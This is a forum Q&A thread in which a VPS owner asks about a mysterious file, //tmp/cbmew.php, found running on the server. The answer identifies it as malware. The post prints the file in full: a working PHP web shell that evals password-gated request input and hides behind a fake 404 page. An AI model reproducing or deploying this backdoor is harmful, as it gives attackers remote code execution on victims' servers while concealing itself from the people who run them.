The mysterious //tmp/cbmew.php

Question

I have a VPS, on which I install a few web applications. All of them are open source application. Recently my VPS load is very high, so I check my daily process log and one thing stands out at me.

enter image description here

Yes, the mysterious //tmp/cbmew.php. I googled cbmew.php and I didn't find anything at all. This is extremely weird as I am using all open source frameworks, so I should be able to find this on the net, no?

Any idea what file can this be?

Here's the content:

<?php
@set_time_limit(0);
@error_reporting(NULL);
@ini_set('display_errors',0);
@ignore_user_abort(TRUE);

if(md5(md5($_REQUEST['psbt']))=='5aa0c942ede6e22dc5a379d86f28037f' and $_REQUEST['mjdu']!=NULL)
{
    $_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
    $_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
    eval($_REQUEST['mjdu']);
    die();
    exit();
}
else
{
    echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit();
}
?>

Have you looked at the code in cbmf.php by opening it in a text editor? It sounds suspicious. — dunxd, Apr 10 '13 at 10:49

score 0 · Accepted Answer · answered Apr 10 '13 at 11:53

0

OK, after some googling, I can be sure that this is a malware.

answered Apr 10 '13 at 11:53

Graviton

2,865
12
42
64

The mysterious //tmp/cbmew.php

1 Answers1